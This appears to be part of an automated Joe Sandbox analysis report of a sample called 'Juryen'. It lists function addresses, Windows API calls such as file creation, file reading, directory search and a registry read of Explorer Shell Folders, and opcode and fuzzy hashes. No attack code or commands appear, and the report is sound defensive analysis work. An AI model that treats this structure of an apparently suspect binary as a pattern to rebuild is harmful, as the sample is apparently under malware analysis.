                                                                    • Associated: 0000000D.00000002.1905404800.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1905404800.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1905404800.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_13_2_400000_Juryen.jbxd
                                                                    Similarity
                                                                    • API ID: FileRead
                                                                    • String ID:
                                                                    • API String ID: 2738559852-0
                                                                    • Opcode ID: 954c46e0e75d823fede48ea8c55c2feae074eed5d1d1543d384a91c6a040f523
                                                                    • Instruction ID: df780c2d30ec27a436fe2e8938b9b3026ee6fdf868a35847a3a0dbf755fefbc9
                                                                    • Opcode Fuzzy Hash: 954c46e0e75d823fede48ea8c55c2feae074eed5d1d1543d384a91c6a040f523
                                                                    • Instruction Fuzzy Hash: 6DD0C97505020DFBDF01CF81DC06FDD7B7DFB05359F108054BA0095060C7759A15AB55
                                                                    Function 0040A30E Relevance: 1.5, APIs: 1, Instructions: 13fileCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • WriteFile.KERNELBASE(00000000,00000000,00000000,00000000,00000000,?,?,0041056A,00000000,004538EC,00000002,?,00412758,00000000,00000000,?), ref: 0040A325
                                                                    Memory Dump Source
                                                                    • Source File: 0000000D.00000002.1905404800.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 0000000D.00000002.1905404800.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1905404800.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1905404800.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_13_2_400000_Juryen.jbxd
                                                                    Similarity
                                                                    • API ID: FileWrite
                                                                    • String ID:
                                                                    • API String ID: 3934441357-0
                                                                    • Opcode ID: ceb9d1a6229db680868981d1c52190471358147ed4569e3c2bde9500725be326
                                                                    • Instruction ID: 3280266517864b8de079c100525e5277478ec149926fcdeece843fe2c70d8c86
                                                                    • Opcode Fuzzy Hash: ceb9d1a6229db680868981d1c52190471358147ed4569e3c2bde9500725be326
                                                                    • Instruction Fuzzy Hash: CFD0C93501020DFBDF01CF81DC06FDD7BBDFB04359F108054BA1095060D7B59A20AB94
                                                                    Function 00413D29 Relevance: 1.5, APIs: 1, Instructions: 13COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • FreeLibrary.KERNELBASE(00000000,004457F2,00000000,000001F7,00000000), ref: 00413D30
                                                                    Memory Dump Source
                                                                    • Source File: 0000000D.00000002.1905404800.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 0000000D.00000002.1905404800.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1905404800.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1905404800.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_13_2_400000_Juryen.jbxd
                                                                    Similarity
                                                                    • API ID: FreeLibrary
                                                                    • String ID:
                                                                    • API String ID: 3664257935-0
                                                                    • Opcode ID: 1d54aae614fa8c55dcd640132eb097a684c5c1cfdaa339356b04098da49b3b41
                                                                    • Instruction ID: 8f6381f957debc367d4a0444659be52de1bfd3a154b3998764173f6a98a011bd
                                                                    • Opcode Fuzzy Hash: 1d54aae614fa8c55dcd640132eb097a684c5c1cfdaa339356b04098da49b3b41
                                                                    • Instruction Fuzzy Hash: 1DD0C9765002229BDB10AF26EC057857378FF00712B110425E810B7594D778BEE68ADC
                                                                    Function 004096C3 Relevance: 1.5, APIs: 1, Instructions: 10fileCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,00000000,00000000,0044509F,00000000,?,00000000,00000104,00445E7E,?,?), ref: 004096D5
                                                                    Memory Dump Source
                                                                    • Source File: 0000000D.00000002.1905404800.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 0000000D.00000002.1905404800.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1905404800.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1905404800.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_13_2_400000_Juryen.jbxd
                                                                    Similarity
                                                                    • API ID: CreateFile
                                                                    • String ID:
                                                                    • API String ID: 823142352-0
                                                                    • Opcode ID: 5246709bc6ec1dabf70528f5ad42ffc01d78c7e2d09fe5df7c46969d7a5ea179
                                                                    • Instruction ID: 15e4bfb1af8ab284213ec8af4af1ca3ed9a3c322684c6da9746693c795416a08
                                                                    • Opcode Fuzzy Hash: 5246709bc6ec1dabf70528f5ad42ffc01d78c7e2d09fe5df7c46969d7a5ea179
                                                                    • Instruction Fuzzy Hash: A8C092B0280200BEFE224B10EC15F36755CE744700F2008247E40F40E0C1605E108524
                                                                    Function 004096DC Relevance: 1.5, APIs: 1, Instructions: 10fileCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • CreateFileW.KERNELBASE(00000000,40000000,00000001,00000000,00000002,00000000,00000000,0041052B,00000000,?,00412758,00000000,00000000,?,00000000,00000000), ref: 004096EE
                                                                    Memory Dump Source
                                                                    • Source File: 0000000D.00000002.1905404800.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 0000000D.00000002.1905404800.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1905404800.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1905404800.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_13_2_400000_Juryen.jbxd
                                                                    Similarity
                                                                    • API ID: CreateFile
                                                                    • String ID:
                                                                    • API String ID: 823142352-0
                                                                    • Opcode ID: ab7a8cdf7eb8bf952c1c1b88a04d9996938fd5cdd98684eb6691b5f60f9c195d
                                                                    • Instruction ID: 13aef0f41518da9c32968a96bed17b980f0e8f352a8d1793a660c4ee04e7d177
                                                                    • Opcode Fuzzy Hash: ab7a8cdf7eb8bf952c1c1b88a04d9996938fd5cdd98684eb6691b5f60f9c195d
                                                                    • Instruction Fuzzy Hash: B8C012F02903007EFF204B10AC0AF37755DF784700F2048207E40F40E1C2B15C008524
                                                                    Function 0040B04B Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • ??3@YAXPAX@Z.MSVCRT(00000000,0040AFD7,00000000,0040B608), ref: 0040B052
                                                                    Memory Dump Source
                                                                    • Source File: 0000000D.00000002.1905404800.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 0000000D.00000002.1905404800.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1905404800.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1905404800.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_13_2_400000_Juryen.jbxd
                                                                    Similarity
                                                                    • API ID: ??3@
                                                                    • String ID:
                                                                    • API String ID: 613200358-0
                                                                    • Opcode ID: ffbe44a51c26d842ca56a491b3c7d92fb1c4d2adc00a6a519549e0909776451f
                                                                    • Instruction ID: 6ff791ec813821c2e9e24527ebed0d702daabad41f6d5d50af9b89e3d4ad0470
                                                                    • Opcode Fuzzy Hash: ffbe44a51c26d842ca56a491b3c7d92fb1c4d2adc00a6a519549e0909776451f
                                                                    • Instruction Fuzzy Hash: ADC09BB15117014BE7305F15D40471373D49F11727F318C1DA5D1914C2D77CD4408518
                                                                    Function 004135E0 Relevance: 1.5, APIs: 1, Instructions: 8COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • FreeLibrary.KERNELBASE(?,00413603,00000000,0044557A,?,?,?,?,?,00403335,?), ref: 004135EC
                                                                    Memory Dump Source
                                                                    • Source File: 0000000D.00000002.1905404800.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 0000000D.00000002.1905404800.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1905404800.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1905404800.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_13_2_400000_Juryen.jbxd
                                                                    Similarity
                                                                    • API ID: FreeLibrary
                                                                    • String ID:
                                                                    • API String ID: 3664257935-0
                                                                    • Opcode ID: 844f7501f44133ba018c3401d7aef3826eb6c790b17bce713828cee3c51aa695
                                                                    • Instruction ID: 97b2006ec1e2dd28fddd19cbcf35086f2a6b1d7d6d8af37d8808782836c913ed
                                                                    • Opcode Fuzzy Hash: 844f7501f44133ba018c3401d7aef3826eb6c790b17bce713828cee3c51aa695
                                                                    • Instruction Fuzzy Hash: C1C04C355107129BE7318F22C849793B3E8BB00767F40C818A56A85454D7BCE594CE28
                                                                    Function 0041493C Relevance: 1.5, APIs: 1, Instructions: 8COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • EnumResourceNamesW.KERNELBASE(?,?,004148B6,00000000), ref: 0041494B
                                                                    Memory Dump Source
                                                                    • Source File: 0000000D.00000002.1905404800.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 0000000D.00000002.1905404800.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1905404800.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1905404800.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_13_2_400000_Juryen.jbxd
                                                                    Similarity
                                                                    • API ID: EnumNamesResource
                                                                    • String ID:
                                                                    • API String ID: 3334572018-0
                                                                    • Opcode ID: 66f1156765df5e37ef2ff2f84c2d9879992723494834984b76c3e66af834c78a
                                                                    • Instruction ID: 4cd0fc1a45efe5f4a77ff86a676eea9814a6d41529a344ef69fdb726e0e13cac
                                                                    • Opcode Fuzzy Hash: 66f1156765df5e37ef2ff2f84c2d9879992723494834984b76c3e66af834c78a
                                                                    • Instruction Fuzzy Hash: 5CC09B355943819FD711DF108C05F1A76D5BF95705F104C397151940A0C7614014A60A
                                                                    Function 0044DEA5 Relevance: 1.5, APIs: 1, Instructions: 8COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • FreeLibrary.KERNELBASE(00000000), ref: 0044DEB6
                                                                    Memory Dump Source
                                                                    • Source File: 0000000D.00000002.1905404800.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 0000000D.00000002.1905404800.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1905404800.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1905404800.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_13_2_400000_Juryen.jbxd
                                                                    Similarity
                                                                    • API ID: FreeLibrary
                                                                    • String ID:
                                                                    • API String ID: 3664257935-0
                                                                    • Opcode ID: bc29afbdeb633a61cc40634aee98d5405fe4c9068b08d77425fcd78e2ed3a7cd
                                                                    • Instruction ID: c12df66a07a312a107e4de7a98dbd39cb061029a89fa16cd2619b088cce9516a
                                                                    • Opcode Fuzzy Hash: bc29afbdeb633a61cc40634aee98d5405fe4c9068b08d77425fcd78e2ed3a7cd
                                                                    • Instruction Fuzzy Hash: 95C04C35D10311ABFB31AB11ED4975232A5BB00717F52006494128D065D7B8E454CB2D
                                                                    Function 0040AEBE Relevance: 1.5, APIs: 1, Instructions: 8COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • FindClose.KERNELBASE(?,0040AE21,?,00000000,00445EF5,*.*,?,00000000,?,00000104,?,?,?,?,?,00000104), ref: 0040AEC8
                                                                    Memory Dump Source
                                                                    • Source File: 0000000D.00000002.1905404800.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 0000000D.00000002.1905404800.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1905404800.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1905404800.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_13_2_400000_Juryen.jbxd
                                                                    Similarity
                                                                    • API ID: CloseFind
                                                                    • String ID:
                                                                    • API String ID: 1863332320-0
                                                                    • Opcode ID: c351b702f3e9cabc65afcca29c8835cc335007c1b5069ed2425bca2f993f3ba3
                                                                    • Instruction ID: 0a5868f0c47a417661f40efe111cada53839b745ef6d73ffe26d621af3302058
                                                                    • Opcode Fuzzy Hash: c351b702f3e9cabc65afcca29c8835cc335007c1b5069ed2425bca2f993f3ba3
                                                                    • Instruction Fuzzy Hash: 06C092341506058BD62C5F38DC9A42A77A0BF4A3303B40F6CA0F3D24F0E73888538A04
                                                                    Function 00414592 Relevance: 1.5, APIs: 1, Instructions: 7registryCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • RegOpenKeyExW.KERNELBASE(80000002,80000002,00000000,00020019,80000002,00414CC1,80000002,Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders,00445DDE,?,?,00000000), ref: 004145A5
                                                                    Memory Dump Source
                                                                    • Source File: 0000000D.00000002.1905404800.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 0000000D.00000002.1905404800.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1905404800.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1905404800.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_13_2_400000_Juryen.jbxd
                                                                    Similarity
                                                                    • API ID: Open
                                                                    • String ID:
                                                                    • API String ID: 71445658-0
                                                                    • Opcode ID: cea4c8dffb5a7e03adddd135b873dbda16caaf5da1da7b073e7ed9ea122c33c6
                                                                    • Instruction ID: 4e31294bd56c0fd8f54a78566f459ab053e1b17b284f5820c9a90ca28514d216
                                                                    • Opcode Fuzzy Hash: cea4c8dffb5a7e03adddd135b873dbda16caaf5da1da7b073e7ed9ea122c33c6
                                                                    • Instruction Fuzzy Hash: C4C09B35544311BFDE114F40FD09F09BB61BB84B05F004414B254640B182714414EB17
                                                                    Function 00409B98 Relevance: 1.5, APIs: 1, Instructions: 7COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • GetFileAttributesW.KERNELBASE(?,0040DAEA,?,0040DBA1,00000000,?,00000000,00000208,?), ref: 00409B9C
                                                                    Memory Dump Source
                                                                    • Source File: 0000000D.00000002.1905404800.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 0000000D.00000002.1905404800.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1905404800.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1905404800.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_13_2_400000_Juryen.jbxd
                                                                    Similarity
                                                                    • API ID: AttributesFile
                                                                    • String ID:
                                                                    • API String ID: 3188754299-0
                                                                    • Opcode ID: 58881c252121c77da0d0db5638804f50f66f4a7a85cb6d231bcd6b2301be346c
                                                                    • Instruction ID: 3e515636d229e53f9e638efbf3d1d2cf0185fd636b5c9b7db17c068ea44c501e
                                                                    • Opcode Fuzzy Hash: 58881c252121c77da0d0db5638804f50f66f4a7a85cb6d231bcd6b2301be346c
                                                                    • Instruction Fuzzy Hash: B9B012792104005BCB0807349C4904D35507F456317200B3CF033C00F0D730CC61BA00
                                                                    Function 0041BE52 Relevance: 1.3, APIs: 1, Instructions: 99COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 0000000D.00000002.1905404800.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 0000000D.00000002.1905404800.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1905404800.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1905404800.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_13_2_400000_Juryen.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: b24af7433d330108988894de74f75be26998b58131ab4cc11d8f9b1f19dcffda
                                                                    • Instruction ID: 186a7b248be49691fb09735f75239c469d17650efe27a5986e87276cb9a2b443
                                                                    • Opcode Fuzzy Hash: b24af7433d330108988894de74f75be26998b58131ab4cc11d8f9b1f19dcffda
                                                                    • Instruction Fuzzy Hash: E8318B31901616EFDF24AF25D8417DA73A0FF04314F10416BF91497251DB38ADE18BDA
                                                                    Function 004095D9 Relevance: 1.3, APIs: 1, Instructions: 66COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • memset.MSVCRT ref: 004095FC
                                                                      • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                                      • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                                      • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                                      • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                                      • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,0040DAEA,?,0040DBA1,00000000,?,00000000,00000208,?), ref: 00409B9C
                                                                      • Part of subcall function 004091B8: memset.MSVCRT ref: 004091E2
                                                                      • Part of subcall function 004091B8: memcpy.MSVCRT(?,00000000,?,?,?,?,?,?,?,?,?,?,00000143,00000000), ref: 004092C9
                                                                      • Part of subcall function 004091B8: memcmp.MSVCRT(00000000,0045A4F0,00000006,?,?,?,?,?,?,?,?,?,?,?,?,00000143), ref: 004092D9
                                                                    Memory Dump Source
                                                                    • Source File: 0000000D.00000002.1905404800.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 0000000D.00000002.1905404800.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1905404800.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1905404800.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_13_2_400000_Juryen.jbxd
                                                                    Similarity
                                                                    • API ID: memsetwcslen$AttributesFilememcmpmemcpywcscatwcscpy
                                                                    • String ID:
                                                                    • API String ID: 3655998216-0
                                                                    • Opcode ID: 06dd2208bba870b09ae4b6a35152530ffce6bfcddb3583e774ca40d5f9d70baf
                                                                    • Instruction ID: 072a19641c33d96fdc78833b4ff670bebeeceb9371718ab52934a970b5968781
                                                                    • Opcode Fuzzy Hash: 06dd2208bba870b09ae4b6a35152530ffce6bfcddb3583e774ca40d5f9d70baf
                                                                    • Instruction Fuzzy Hash: F311607290021D6AEF20A662DC4AE9B376CEF41318F10047BB908E51D2EA79DE548659
                                                                    Function 00445403 Relevance: 1.3, APIs: 1, Instructions: 60COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • memset.MSVCRT ref: 00445426
                                                                      • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                                      • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                                      • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                                      • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                                      • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,0040DAEA,?,0040DBA1,00000000,?,00000000,00000208,?), ref: 00409B9C
                                                                      • Part of subcall function 0040B6EF: memset.MSVCRT ref: 0040B71C
                                                                      • Part of subcall function 0040B6EF: wcsrchr.MSVCRT ref: 0040B738
                                                                      • Part of subcall function 0040B6EF: memset.MSVCRT ref: 0040B756
                                                                      • Part of subcall function 0040B6EF: memset.MSVCRT ref: 0040B7F5
                                                                      • Part of subcall function 0040B6EF: CreateFileW.KERNELBASE(00445FAE,80000000,00000000,00000000,00000003,00000000,00000000,?,?), ref: 0040B80C
                                                                    Memory Dump Source
                                                                    • Source File: 0000000D.00000002.1905404800.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 0000000D.00000002.1905404800.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1905404800.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1905404800.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_13_2_400000_Juryen.jbxd
                                                                    Similarity
                                                                    • API ID: memset$Filewcslen$AttributesCreatewcscatwcscpywcsrchr
                                                                    • String ID:
                                                                    • API String ID: 1828521557-0
                                                                    • Opcode ID: 30388877fc1f1466cb5fc4dbbd946ecf0cc3df28c932be715bfff3731eba89eb
                                                                    • Instruction ID: 9d1500c39017731ad640c46c84131142cb98d7893e2d711cbdbff08f65233ce4
                                                                    • Opcode Fuzzy Hash: 30388877fc1f1466cb5fc4dbbd946ecf0cc3df28c932be715bfff3731eba89eb
                                                                    • Instruction Fuzzy Hash: 4B1186B294011D7BEB10E751DC4AFDB776CEF51328F10047FB518A50C2E6B8AAC486A9
                                                                    Function 0042BF4C Relevance: 1.3, APIs: 1, Instructions: 59COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                      • Part of subcall function 00415A91: memset.MSVCRT ref: 00415AAB
                                                                    • memset.MSVCRT ref: 0042BFC0
                                                                    Memory Dump Source
                                                                    • Source File: 0000000D.00000002.1905404800.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 0000000D.00000002.1905404800.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1905404800.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1905404800.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_13_2_400000_Juryen.jbxd
                                                                    Similarity
                                                                    • API ID: memset
                                                                    • String ID:
                                                                    • API String ID: 2221118986-0
                                                                    • Opcode ID: a0780bb49d8a07aeac5707b5a6201decdf5b3787da807124ae81a49ee348ef3f
                                                                    • Instruction ID: 98d7c88e32de7b71128496fa216618f30369d33ff21347cb3a36463818225643
                                                                    • Opcode Fuzzy Hash: a0780bb49d8a07aeac5707b5a6201decdf5b3787da807124ae81a49ee348ef3f
                                                                    • Instruction Fuzzy Hash: A7012B327009226BD700AB29AC41A4AB3D8EFD4314B16402FF508D7341EF78EC114BD8
                                                                    Function 00406B90 Relevance: 1.3, APIs: 1, Instructions: 56COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 0000000D.00000002.1905404800.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 0000000D.00000002.1905404800.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1905404800.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1905404800.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_13_2_400000_Juryen.jbxd
                                                                    Similarity
                                                                    • API ID: _wcsicmp
                                                                    • String ID:
                                                                    • API String ID: 2081463915-0
                                                                    • Opcode ID: cbddd43e50b6ded4d98ad0d82dd6b3ceb41ab08d79f44c56bc7594620457dfc9
                                                                    • Instruction ID: 44e68c08f8902dbc9d3bec9e3d7b81d72528a2b8c41660eeece459a1934edfa0
                                                                    • Opcode Fuzzy Hash: cbddd43e50b6ded4d98ad0d82dd6b3ceb41ab08d79f44c56bc7594620457dfc9
                                                                    • Instruction Fuzzy Hash: 0C118CB1600205AFD710DF65C8809AAB7F8FF44314F11843EE55AE7240EB34F9658B68
                                                                    Function 00406214 Relevance: 1.3, APIs: 1, Instructions: 39COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                      • Part of subcall function 00406294: CloseHandle.KERNEL32(000000FF,00406224,00000000,00000000,0040E03C,?,00000000,00000104,00000000,?,?,?,0040E521,?,0040E6A3,000000FF), ref: 0040629C
                                                                      • Part of subcall function 004096C3: CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,00000000,00000000,0044509F,00000000,?,00000000,00000104,00445E7E,?,?), ref: 004096D5
                                                                    • GetLastError.KERNEL32(00000000,00000000,0040E03C,?,00000000,00000104,00000000,?,?,?,0040E521,?,0040E6A3,000000FF,?,00000104), ref: 00406281
                                                                      • Part of subcall function 0040A2EF: ReadFile.KERNELBASE(00000000,00000000,004450DD,00000000,00000000,?,?,004450DD,00000000,00000000), ref: 0040A306
                                                                    Memory Dump Source
                                                                    • Source File: 0000000D.00000002.1905404800.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 0000000D.00000002.1905404800.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1905404800.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1905404800.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_13_2_400000_Juryen.jbxd
                                                                    Similarity
                                                                    • API ID: File$CloseCreateErrorHandleLastRead
                                                                    • String ID:
                                                                    • API String ID: 2136311172-0
                                                                    • Opcode ID: b6bd1096ce10d17f9a7701a6d0a27b928aedeb77931263aba22673ea05e1db24
                                                                    • Instruction ID: 5eec059ee86d0bbb8aaa5289f200f29bbda103cdac5cb86a40c163b72aa3aa4c
                                                                    • Opcode Fuzzy Hash: b6bd1096ce10d17f9a7701a6d0a27b928aedeb77931263aba22673ea05e1db24
                                                                    • Instruction Fuzzy Hash: 3F01D6B14017018FD7206B70CD05BA273D8EF10319F11897EE55BE62D1EB3C9861866E
                                                                    Function 0040AFCF Relevance: 1.3, APIs: 1, Instructions: 12COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                      • Part of subcall function 0040B04B: ??3@YAXPAX@Z.MSVCRT(00000000,0040AFD7,00000000,0040B608), ref: 0040B052
                                                                    • ??2@YAPAXI@Z.MSVCRT(00000000,00000000,0040B608), ref: 0040AFD8
                                                                    Memory Dump Source
                                                                    • Source File: 0000000D.00000002.1905404800.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 0000000D.00000002.1905404800.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1905404800.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1905404800.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_13_2_400000_Juryen.jbxd
                                                                    Similarity
                                                                    • API ID: ??2@??3@
                                                                    • String ID:
                                                                    • API String ID: 1936579350-0
                                                                    • Opcode ID: b7d64a9db0ab8f7e7b6c625ee8b1c93a5659d73149cb5b89327274070e360fa5
                                                                    • Instruction ID: 89dc8af08517091935dcea8fd058adf4401913b4726dbdea6cb301b2924d739e
                                                                    • Opcode Fuzzy Hash: b7d64a9db0ab8f7e7b6c625ee8b1c93a5659d73149cb5b89327274070e360fa5
